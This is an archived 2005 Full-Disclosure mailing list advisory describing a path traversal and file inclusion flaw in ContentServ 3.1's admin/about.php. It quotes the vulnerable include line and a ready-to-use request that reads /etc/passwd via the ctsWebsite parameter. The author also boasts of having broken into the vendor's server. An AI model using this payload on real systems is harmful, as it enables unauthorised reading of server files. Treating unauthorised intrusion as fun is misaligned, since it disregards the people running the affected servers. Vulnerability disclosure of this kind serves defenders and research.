OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
[Full-disclosure] ContentServ features remote file disclosure

qobaiashigmx.net
Date: Sun Sep 25 2005 - 09:20:55 CDT


----------------------------------------------------------------------
--[ ContentServ (still) features remote reading of arbitrary files ]--
-------------------------[ qobaiashigmx.net ]------------------------

/* Boring PHP bug warning:
 * """"""""""""""""""""""""""""""
 * By reading boring PHP bug advisories it is possible to
 * fall asleep (if not affected) instantly w/o a warning!
 *
 * I told you, it's your decision now.
 */

ContentServ is a cms developed by ... ContentServ.de and is a quite
commonly used cms system at least in .de.

Some months ago while pentesting www.contentserv.com i've found a bug
(yo alex i rooted you back then but somehow you didn't need sec support)
in ContentServ 3.1. which - to my surprise - is still accessible on some
installations. Somebody should have read the apache logs over there ;)
I had some fun with it (the bug and your server) back then.

The bug resides in /admin/about.php:
[...]
        include("../$ctsWebsite/data/config.php");
[...]

This boils down to a damn stupid:

www.we-cant-design-our-hp.com/contentserv/3.1/admin/about.php?
ctsWebsite=../../../../../../../../../../etc/passwd%00

to give you some informations.

-----------------------------
Disclosure timeline:

Bug found: 2004
Bug disclosed: Son Sep 25 16:04:40 CEST 2005
Bug fixed: ask your vendor

have fun.
-q
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/